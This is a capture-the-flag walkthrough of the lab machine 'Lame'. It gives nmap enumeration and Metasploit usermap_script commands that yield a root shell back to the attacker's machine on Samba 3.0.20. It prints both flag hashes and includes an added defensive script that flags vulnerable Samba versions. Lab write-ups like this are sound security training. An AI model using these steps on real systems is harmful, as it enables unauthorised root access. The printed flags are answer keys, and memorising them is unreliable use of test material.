
Lame


Enumeration


As usual, let's start with nmap:

nmap -sV -sC 10.10.10.3

The scan output tells us to retry with -Pn, which skips host discovery. Let's try:

nmap -sV -sC -Pn 10.10.10.3

nmap tells us that port 445 is open. This port is associated with Samba, and the reported version is Samba 3.0.20.

Let's Google "samba 3.0.20 exploit" and see if anything is available. There is one, and we can access it directly from Metasploit.
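For the defensive side of the same finding, the added example below (not part of the original write-up) parses nmap -sV output and flags hosts that report Samba 3.0.20, the version identified above. The scan text is a constructed sample; the 192.0.2.x hosts and the names SERVICE_RE and triage are assumptions made for illustration.

```python
import re

# Constructed sample of `nmap -sV` normal output (not captured from a real
# scan). Only 10.10.10.3 and Samba 3.0.20 come from the write-up.
SAMPLE_SCAN = """\
Nmap scan report for 10.10.10.3
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Nmap scan report for 192.0.2.10
PORT    STATE SERVICE     VERSION
445/tcp open  netbios-ssn Samba smbd 4.15.13 (workgroup: WORKGROUP)
Nmap scan report for 192.0.2.11
PORT    STATE SERVICE     VERSION
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
"""

FLAGGED_VERSION = "3.0.20"  # version the write-up found a Metasploit module for

# Open TCP port whose service banner starts with "Samba smbd <token>".
SERVICE_RE = re.compile(r"^(\d+)/tcp\s+open\s+\S+\s+Samba smbd (\S+)")


def triage(scan_text):
    """Map each host with a Samba banner to flagged / other-version / unverified."""
    rank = {"unverified": 0, "other-version": 1, "flagged": 2}
    results, host = {}, None
    for line in scan_text.splitlines():
        if line.startswith("Nmap scan report for "):
            # Handles both "for 10.0.0.1" and "for name (10.0.0.1)".
            host = line.split()[-1].strip("()")
            continue
        m = SERVICE_RE.match(line)
        if not (m and host):
            continue
        exact = re.match(r"\d+\.\d+\.\d+", m.group(2))
        if exact is None:
            status = "unverified"   # banner gave only a range such as 3.X - 4.X
        elif exact.group(0) == FLAGGED_VERSION:
            status = "flagged"
        else:
            status = "other-version"
        # Keep the most severe status seen across a host's ports.
        if rank[status] >= rank.get(results.get(host), -1):
            results[host] = status
    return results


if __name__ == "__main__":
    for host, status in triage(SAMPLE_SCAN).items():
        print(f"{host}: {status}")
```

Hosts marked unverified only exposed a version range in their banner and need a follow-up check (for example, reading the installed package version on the host) before they can be cleared.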


Let's load Metasploit using:

msfconsole
search samba 3.0.20

use exploit/multi/samba/usermap_script

show options

We need to set both RHOSTS and LHOST:

set RHOSTS 10.10.10.3

10.10.10.3 is the IP of the target machine.

set LHOST 10.10.14.12

LHOST is the IP of your VM. Mine is 10.10.14.12. Yours will be different.

exploit

It worked! We now have a shell on the target machine.

whoami

We are root!

ls
cd home
ls
cd makis
ls
cat user.txt

856c4e7468499c31b63029bec549af33

Congratulations! You got the user flag!


Now let's look for the root flag:

cd /root
cat user.txt
cat root.txt

674dfcc1c188d43df6664b6fa8ab3a35

Congratulations! You got the root flag!
